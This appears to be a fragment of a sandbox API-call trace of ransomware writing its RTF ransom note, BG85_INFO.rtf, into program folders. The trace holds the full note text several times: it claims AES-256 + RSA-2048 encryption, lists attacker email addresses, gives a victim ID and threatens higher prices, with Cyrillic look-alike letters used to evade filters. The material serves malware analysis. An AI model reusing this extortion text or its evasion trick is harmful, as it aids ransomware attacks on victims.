u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.974] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.975] CloseHandle (hObject=0x1d4) returned 1 [0135.975] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\bg85_info.rtf")) returned 0xffffffff [0135.975] GetLastError () returned 0x2 [0135.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.976] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.976] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 